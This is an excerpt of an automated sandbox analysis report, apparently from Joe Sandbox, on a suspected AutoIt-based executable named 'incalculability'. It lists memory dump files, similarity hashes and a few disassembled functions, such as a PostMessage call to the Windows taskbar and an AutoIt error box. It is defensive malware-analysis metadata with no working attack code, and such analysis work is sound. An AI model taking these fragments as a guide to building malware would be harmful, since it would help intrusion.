                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            • API String ID: 529655941-2988720461
                            • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                            • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                            • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                            • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                            Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                            Download Yara Rule
                            APIs
                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                              • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            • API String ID: 529655941-2988720461
                            • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                            • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                            • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                            • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                            Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                            Download Yara Rule
                            APIs
                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                              • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Message_doexit
                            • String ID: AutoIt$Error allocating memory.
                            • API String ID: 1993061046-4017498283
                            • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                            • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                            • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                            • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D